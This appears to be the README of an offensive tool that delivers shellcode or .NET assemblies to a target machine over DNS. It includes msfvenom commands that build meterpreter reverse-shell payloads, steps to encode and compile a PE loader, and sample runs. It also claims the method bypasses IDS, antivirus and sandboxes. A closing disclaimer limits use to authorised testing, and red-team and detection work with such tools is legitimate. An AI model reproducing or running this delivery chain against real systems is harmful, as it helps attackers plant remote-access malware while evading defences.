
The only mandatory configurable parameter on the client side is the DNS domain name you want to use (the one you’re running the DNS server side on). An optionnal configurable parameter is the DNS server you want to use. By default, it will use the system’s default DNS server.

  • For the C# script, you need to edit the script and set the parameters in the PARAM class, comments and variable names are pretty self-explanatory. Then compile it using the built-in C# compiler csc.exe: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:dnsdelivery.exe *.cs


  • For the PowerShell script, you can simply pass the parameters as arguments. Once the module is loaded into powershell simply check the syntax with Get-Help Invoke-DNSDelivery



Call the ` script with the appropriate parameters:

  • The type of content being delivered: can be either shellcode or assembly
  • The filename which is the name (or path) of the file being delivered

If a shellcode type is to be delivered, it must be a raw type shellcode obtained, for instance, from metasploit:

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw > myShellcodeFile.raw

Example of delivering a shellcode:

root@kali:~# ./ shellcode myShellcodeFile.raw
[*] File [myShellcodeFile.raw] successfully loaded
[*] Data split into [5] chunks of 250 bytes
[*] DNS server listening on port 53
[*] Serving [myShellcodeFile.raw] advertised as a [shellcode] data type

Example of delivering a .Net assembly:

root@kali:~# ./ assembly peloader.exe
[*] File [peloader.exe] successfully loaded
[*] Data split into [1058] chunks of 250 bytes
[*] DNS server listening on port 53
[*] Serving [peloader.exe] advertised as a [assembly] data type


If using the C# compiled Windows executable: simply execute it, the parameters are hardcoded within the script.

If using the PowerShell script, well, call it in any of your prefered way (you probably know tons of ways of invoking a powershell script) along with the script parameters. Most basic example:

c:\DNSDelivery> powershell
PS c:\DNSDelivery> Import-Module .\Invoke-DNSDelivery.ps1
PS c:\DNSDelivery> Invoke-DNSDelivery -DomainName -Verbose

Sample use cases

I found this delivery method very useful and handy for delivering:

  • any meterpreter shellcode
  • full-fledged meterpreter executable (standalone meterpreter executable, not staged)
  • any .Net assembly you can think of

while completely bypassing perimeter security (IDS, content analysis like AV and sandboxes on proxies, etc.).

Example of delivering a full-fledged meterpreter executable:

First create a non-staged meterpreter executable:

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= LPORT=4444 -f exe-only > meterpreter.exe

Second, encode this executable to a base64 string:

root@kali:~# cat meterpreter.exe | base64 -w 0 > meterpreter.b64

Third paste the base64 string (yes, it can be huge, around 3MB) into the peLoader.cs (thx @SubTee) available here peloader.cs and compile this into a Windows executable (which by the way IS a .Net assembly).

Eventually, serve it with DNSDelivery:

root@kali:~# ./ assembly meterpreter_peloader.exe

It can be long because the data is delivered over DNS, chunk by chunk (250 bytes per chunk), but who cares if it takes 10 minutes and you eventually get you full-fledged meterpreter executable loaded into memory and executed on the victim’s machine 🙂


This tool is intended to be used in a legal and legitimate way only:

  • either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms
  • on systems you’ve been officially and legitimately entitled to perform some security assessments (pentest, security audits)

Quoting Empire’s authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.
